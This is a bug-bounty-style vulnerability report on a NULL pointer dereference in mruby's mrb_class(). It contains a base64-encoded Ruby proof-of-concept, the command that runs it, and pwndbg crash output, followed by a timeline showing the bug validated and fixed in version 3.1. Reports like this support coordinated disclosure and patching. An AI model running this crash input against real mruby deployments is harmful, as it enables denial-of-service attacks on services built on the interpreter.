NULL Pointer Dereference in mruby/mruby

Valid

Reported on

Dec 27th 2021


Description

A NULL Pointer Dereference was discovered in mrb_class(). The vulnerability causes a segmentation fault and application crash.

version

6de0fcb

./mruby -v
mruby 3.0.0 (2021-03-05)

System information Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

Proof of Concept

poc

base64 poc
Y2xhc3MgVmNsYXNzDQoJQEB2YXJyID0gWzEsMiwzLDQsNSw2LDcsOCw5LDEwLCoxLDEyLDEzLDE0
LDE1LDE2LDE3XQ0KCWRlZiB2YXJyDQoJCUBAdmFycg0KCWVuZA0KCWRlZiB0b19pJnQNCgkJQEB2
YXJyLmNsZWFyDQoJCTExDQoJZW5kDQplbmQNCg0Kb2JqID0gVmNsYXNzLm5ldw0KDQpwcmludCBv
YmoudmFyci5zaGlmdChvYmop

command:

./mruby ./poc

Result

./mruby ./poc
[1]    2623876 segmentation fault  ./mruby ./poc

gdb

Program received signal SIGSEGV, Segmentation fault.
mrb_class (v=..., mrb=<optimized out>) at /home/aidai/fuzzing/mruby/mruby-master/include/mruby/boxing_word.h:139
139       return x;
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
───────────────────────────────[ REGISTERS ]────────────────────────────────
 RAX  0x14
 RBX  0x38
 RCX  0x7
 RDX  0x14
 RDI  0x1
 RSI  0xffffffff
 R8   0x55555566bbb0 ◂— 0x0
 R9   0x0
 R10  0x3
 R11  0x55555566fb08 ◂— 0x14
 R12  0x2eb
 R13  0x14
 R14  0x7
 R15  0x2f
 RBP  0x0
 RSP  0x7fffffffda60 —▸ 0x55555565d2a0 —▸ 0x7fffffffdce0 ◂— 0x6
 RIP  0x55555557d03c (mrb_vm_exec+16844) ◂— mov    rax, qword ptr [rdx]
─────────────────────────────────[ DISASM ]─────────────────────────────────
 ► 0x55555557d03c <mrb_vm_exec+16844>    mov    rax, qword ptr [rdx]
   0x55555557d03f <mrb_vm_exec+16847>    jmp    mrb_vm_exec+1400
    <mrb_vm_exec+1400>
    ↓
   0x5555555793e8 <mrb_vm_exec+1400>     lea    rcx, [rsp + 0x268]
   0x5555555793f0 <mrb_vm_exec+1408>     mov    rdi, qword ptr [rsp]
   0x5555555793f4 <mrb_vm_exec+1412>     mov    edx, r12d
   0x5555555793f7 <mrb_vm_exec+1415>     mov    qword ptr [rsp + 0x268], rax
   0x5555555793ff <mrb_vm_exec+1423>     mov    rsi, rcx
   0x555555579402 <mrb_vm_exec+1426>     mov    qword ptr [rsp + 0x70], rcx
   0x555555579407 <mrb_vm_exec+1431>     call   mrb_method_search_vm                <mrb_method_search_vm>

   0x55555557940c <mrb_vm_exec+1436>     mov    r15, rax
   0x55555557940f <mrb_vm_exec+1439>     test   rax, rax
─────────────────────────────[ SOURCE (CODE) ]──────────────────────────────
In file: /home/aidai/fuzzing/mruby/mruby-master/include/mruby/boxing_word.h
   134 static inline union mrb_value_
   135 mrb_val_union(mrb_value v)
   136 {
   137   union mrb_value_ x;
   138   x.value = v;139   return x;
   140 }
   141
   142 MRB_API mrb_value mrb_word_boxing_cptr_value(struct mrb_state*, void*);
   143 #ifndef MRB_NO_FLOAT
   144 MRB_API mrb_value mrb_word_boxing_float_value(struct mrb_state*, mrb_float);
─────────────────────────────────[ STACK ]──────────────────────────────────
00:0000rsp 0x7fffffffda60 —▸ 0x55555565d2a0 —▸ 0x7fffffffdce0 ◂— 0x6
01:00080x7fffffffda68 —▸ 0x55555561f7c3 (mrblib_proc_iseq_115+99) ◂— 0x2501053d0103062f
02:00100x7fffffffda70 —▸ 0x55555564c2a0 (mrblib_proc_irep_115) ◂— 0x30000000b0006
03:00180x7fffffffda78 —▸ 0x55555561f7f0 (mrblib_proc_syms_115) ◂— 0x36700000125
04:00200x7fffffffda80 —▸ 0x7fffffffdce0 ◂— 0x6
05:00280x7fffffffda88 —▸ 0x55555567bf18 —▸ 0x55555567bee8 —▸ 0x55555567bed0 ◂— 0x1a
06:00300x7fffffffda90 ◂— 0x1
07:00380x7fffffffda98 —▸ 0x55555566a2b0 ◂— 0x0
───────────────────────────────[ BACKTRACE ]────────────────────────────────
 ► f 0   0x55555557d03c mrb_vm_exec+16844
   f 1   0x55555557d03c mrb_vm_exec+16844
   f 2   0x55555558300b mrb_vm_run+155
   f 3   0x555555584ed5 mrb_top_run+133
   f 4   0x5555555c7540 mrb_load_exec+752
   f 5   0x5555555c92b0 mrb_load_detect_file_cxt+400
   f 6   0x5555555756de main+1486
   f 7   0x7ffff7c980b3 __libc_start_main+243
────────────────────────────────────────────────────────────────────────────
pwndbg> bt
#0  mrb_class (v=..., mrb=<optimized out>) at /home/aidai/fuzzing/mruby/mruby-master/include/mruby/boxing_word.h:139
#1  mrb_vm_exec (mrb=<optimized out>, proc=<optimized out>, pc=0x55555561f7c3 <mrblib_proc_iseq_115+99> "/\006\003\001=\005\001%\377\331Q\006\002\001\a\004Q\b\003/\a\004\001<\006Q\a\004<\006\070\006") at /home/aidai/fuzzing/mruby/mruby-master/src/vm.c:1616
#2  0x000055555558300b in mrb_vm_run (mrb=0x55555565d2a0, proc=proc@entry=0x555555661b50, self=..., stack_keep=0) at /home/aidai/fuzzing/mruby/mruby-master/src/vm.c:1091
#3  0x0000555555584ed5 in mrb_top_run (mrb=mrb@entry=0x55555565d2a0, proc=proc@entry=0x555555661b50, self=..., stack_keep=stack_keep@entry=0) at /home/aidai/fuzzing/mruby/mruby-master/src/vm.c:3050
#4  0x00005555555c7540 in mrb_load_exec (mrb=mrb@entry=0x55555565d2a0, p=p@entry=0x55555567ab10, c=c@entry=0x555555679940) at mrbgems/mruby-compiler/core/parse.y:6881
#5  0x00005555555c92b0 in mrb_load_detect_file_cxt (mrb=0x55555565d2a0, fp=0x555555679740, c=0x555555679940) at mrbgems/mruby-compiler/core/parse.y:6794
#6  0x00005555555756de in main (argc=argc@entry=2, argv=argv@entry=0x7fffffffe1d8) at /home/aidai/fuzzing/mruby/mruby-master/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:347
#7  0x00007ffff7c980b3 in __libc_start_main (main=0x555555575110 <main>, argc=2, argv=0x7fffffffe1d8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe1c8) at ../csu/libc-start.c:308
#8  0x0000555555575a5e in _start () at /home/aidai/fuzzing/mruby/mruby-master/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:282
We are processing your report and will contact the mruby team within 24 hours. a year ago
We have contacted a member of the mruby team and are waiting to hear back a year ago
Yukihiro "Matz" Matsumoto validated this vulnerability a year ago
aidaip has been awarded the disclosure bounty
The fix bounty is now up for grabs
Yukihiro "Matz" Matsumoto marked this as fixed in 3.1 with commit 27d1e0 a year ago
Yukihiro "Matz" Matsumoto has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation